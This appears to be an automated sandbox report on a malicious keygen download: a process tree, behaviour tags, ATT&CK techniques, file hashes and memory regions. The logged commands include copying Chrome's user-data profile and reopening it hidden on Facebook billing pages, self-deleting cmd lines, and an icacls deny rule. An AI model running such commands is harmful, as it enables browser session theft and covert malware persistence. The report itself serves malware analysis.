C:\Users\Admin\AppData\Local\Temp\H4CVZZKYD5\setups.exe"C:\Users\Admin\AppData\Local\Temp\H4CVZZKYD5\setups.exe" ll5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AIUHI.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-AIUHI.tmp\setups.tmp" /SL5="$B007E,726852,244736,C:\Users\Admin\AppData\Local\Temp\H4CVZZKYD5\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff85d474f50,0x7ff85d474f60,0x7ff85d474f706⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2748 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1864 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1852 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1804 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1792,1807429984447691535,10495638461696146372,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F1943068CB05F7AF91EE19C892846D60 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5F4C6E42535552D574FCFD678A2CCA912⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1dc,0x1d8,0x1d4,0x98,0x1d0,0x7ff86c159ec0,0x7ff86c159ed0,0x7ff86c159ee05⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --mojo-platform-channel-handle=1724 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2396 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --mojo-platform-channel-handle=2272 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --mojo-platform-channel-handle=3104 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1672 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,390768059602166692,14473942554308351341,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6424_1082833542" --mojo-platform-channel-handle=2652 /prefetch:85⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE2D1.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE2D1.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE2D1.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXE34F.bat" "3⤵
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXE34F.bat"4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXE34F.bat" "4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{63ac1111-d236-794c-a5a3-9200eadd7f37}\oemvista.inf" "9" "4d14a44ff" "000000000000017C" "WinSta0\Default" "0000000000000180" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\B155.exeC:\Users\Admin\AppData\Local\Temp\B155.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\BB0B.exeC:\Users\Admin\AppData\Local\Temp\BB0B.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C3E5.exeC:\Users\Admin\AppData\Local\Temp\C3E5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D674.exeC:\Users\Admin\AppData\Local\Temp\D674.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D674.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E059.exeC:\Users\Admin\AppData\Local\Temp\E059.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E701.exeC:\Users\Admin\AppData\Local\Temp\E701.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\ED6A.exeC:\Users\Admin\AppData\Local\Temp\ED6A.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F49F.exeC:\Users\Admin\AppData\Local\Temp\F49F.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F49F.exeC:\Users\Admin\AppData\Local\Temp\F49F.exe2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\6D5A.exeC:\Users\Admin\AppData\Local\Temp\6D5A.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7C9E.exeC:\Users\Admin\AppData\Local\Temp\7C9E.exe1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 7C9E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7C9E.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Users\Admin\AppData\Local\Temp\8828.exeC:\Users\Admin\AppData\Local\Temp\8828.exe1⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\1e823722-ab00-4502-8e95-f798db4fc0ec" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\9BC0.exeC:\Users\Admin\AppData\Local\Temp\9BC0.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Defense Evasion
File Permissions Modification
1Modify Registry
3Install Root Certificate
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.datMD5
f6564705843ccddde763c00ac9e10e3a
SHA146a572f4ac0698f6457ab6cc12e98841155e8270
SHA2562c174427e8817b634ad1c5f66cbbef6c90972991ca5988311366b12cdd8c2e7d
SHA5123360f223ee448183df6ccac063f92b37708e80c204204dc024eb70e1d80d73a6a93a125ef612d1d69091e6bc0a5f20003c65da4d057a739b883964e62fc8ddb8
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exeMD5
65b49b106ec0f6cf61e7dc04c0a7eb74
SHA1a1f4784377c53151167965e0ff225f5085ebd43b
SHA256862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd
SHA512e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.batMD5
a12e7acce9c54e8f477830c938cd5bb7
SHA1482ac6ae9ea9ab1673e1444269bba2ef7a86794c
SHA256b5433a43058d8b81958e13064f7d5485b787d6812513600c27b913dc5c3b3bd0
SHA5125198b9b7f7ab17a0173a5eed18f3b1906ab3fc64da62cfb765ff43539acdcf3a0eafeefe6184f51f1fbebaacdb0bdf422572b4b3ba70de0b116c779f5e1b7174
-
\??\pipe\crashpad_2116_HSHZWQRJYZUUCYXMMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/208-127-0x0000000000000000-mapping.dmp
-
memory/856-225-0x0000000000000000-mapping.dmp
-
memory/912-279-0x000001E4B4B10000-0x000001E4B4B77000-memory.dmpFilesize
412KB
-
memory/1004-227-0x0000000000000000-mapping.dmp
-
memory/1012-269-0x000001E6DB280000-0x000001E6DB2E7000-memory.dmpFilesize
412KB
-
memory/1100-276-0x00000258DF030000-0x00000258DF097000-memory.dmpFilesize
412KB
-
memory/1120-116-0x0000000000000000-mapping.dmp
-
memory/1172-205-0x0000000000000000-mapping.dmp
-
memory/1292-300-0x00000000007E0000-0x00000000007E1000-memory.dmpFilesize
4KB
-
memory/1292-221-0x0000000000000000-mapping.dmp
-
memory/1316-258-0x000001F058470000-0x000001F0584D7000-memory.dmpFilesize
412KB
-
memory/1348-283-0x0000022EED100000-0x0000022EED167000-memory.dmpFilesize
412KB
-
memory/1448-282-0x000001A710610000-0x000001A710677000-memory.dmpFilesize
412KB
-
memory/1464-156-0x0000000000000000-mapping.dmp
-
memory/1816-284-0x0000000002750000-0x0000000002752000-memory.dmpFilesize
8KB
-
memory/1872-254-0x0000023E96B70000-0x0000023E96BB4000-memory.dmpFilesize
272KB
-
memory/1872-255-0x0000023E97740000-0x0000023E977A7000-memory.dmpFilesize
412KB
-
memory/2196-134-0x0000000000000000-mapping.dmp
-
memory/2288-122-0x0000000000000000-mapping.dmp
-
memory/2372-274-0x000001A3B4EE0000-0x000001A3B4F47000-memory.dmpFilesize
412KB
-
memory/2384-161-0x0000000000000000-mapping.dmp
-
memory/2424-272-0x0000018CA3F40000-0x0000018CA3FA7000-memory.dmpFilesize
412KB
-
memory/2560-266-0x000001B274C80000-0x000001B274CE7000-memory.dmpFilesize
412KB
-
memory/2680-260-0x0000023A60240000-0x0000023A602A7000-memory.dmpFilesize
412KB
-
memory/2704-140-0x0000000000000000-mapping.dmp
-
memory/2708-262-0x0000020ED6B70000-0x0000020ED6BD7000-memory.dmpFilesize
412KB
-
memory/2916-123-0x00007FF877DF0000-0x00007FF877DF1000-memory.dmpFilesize
4KB
-
memory/2916-121-0x0000000000000000-mapping.dmp
-
memory/3288-246-0x0000000000E20000-0x0000000000E22000-memory.dmpFilesize
8KB
-
memory/3460-209-0x0000000000000000-mapping.dmp
-
memory/3508-149-0x0000000000000000-mapping.dmp
-
memory/3696-264-0x000001A1633F0000-0x000001A163457000-memory.dmpFilesize
412KB
-
memory/3768-210-0x0000000000000000-mapping.dmp
-
